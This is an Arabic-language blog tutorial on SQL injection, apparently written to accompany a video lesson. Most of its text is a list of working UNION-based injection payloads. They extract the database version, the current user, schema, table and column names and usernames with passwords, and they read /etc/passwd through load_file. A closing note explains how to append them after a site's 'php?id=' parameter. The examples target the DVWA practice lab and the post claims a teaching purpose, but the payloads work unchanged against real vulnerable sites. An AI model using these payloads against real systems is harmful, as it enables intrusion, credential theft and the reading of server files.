شرح ثغرة sql-injection و استغلالها بالتفصيل




بسم الله الرحمان الرحيم
مرحبا بكم اعزائي زوار مدونة الجوكر للمعلوميات في هذا الدرس ان شاء الله سنتعرف على احدى الثغرات الاكثر انتشارا على النت
طبعا ربما يوجد العديد من الشرحات لاستغلال الثغرة و لكن لن تجد شرح الثغرة بذاتها ولم تجد طريقة الاستغلال بهذه الطريقة
طبعا هذه الثغرة متواجدة بكثرة على النت ولكن الهدف من الدرس هو التعلم و الحماية
وليس التطبيق على مواقع لا حول لها في الحماية
الدرس تناول الشرح النظري باهمية اكثر من التطبيقي وهذا للفهم 
طبعا الاكواد التي بها تستغل الثغرة هي اسفل الفيديو
وقبل الانتقال الى الفيديو لا تنسى متابعتي على الفيسبوك و على اليوتيوب




الاكواد هي هاته طبعا بامكانك فهم مهامها من قرائتها واذ لم تفهم اي امر اطرح سؤالك في تعليق او في رسالة على الصفحة
' and 1=1 union select database(),version() #

' union SELECT 1, @@version #

' and 1=1 union select null,user() #

' union SELECT 1, user() #

' and 1=1 union select null,table_schema from information_schema.tables #

' and 1=1 union select table_name,table_schema from information_schema.tables #

' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='dvwa' #

' and 1=1 union select table_name,column_name from information_schema.column where table_schema='dvwa' #

' and 1=1 union select first_name,password from dvwa.users #

' union SELECT 1, load_file('/etc/hosts') #

' union SELECT 1, load_file('/etc/passwd') #

' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' #

' union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'user_id' #

' union select user, password FROM users #

 ملاحظة
هذه الاوامر توضع في ربط الموقع بعد الجملة التالية
php?id=n
  هو رقم وهو رقم الخانة المصبة بالثغرة المهم ان تضيف الكود بعد الحرف الذي n
بالاحمر


ليست هناك تعليقات:

جميع الحقوق محفوظة © 2013 الجوكر للمعلوميات
تصميم : يعقوب رضا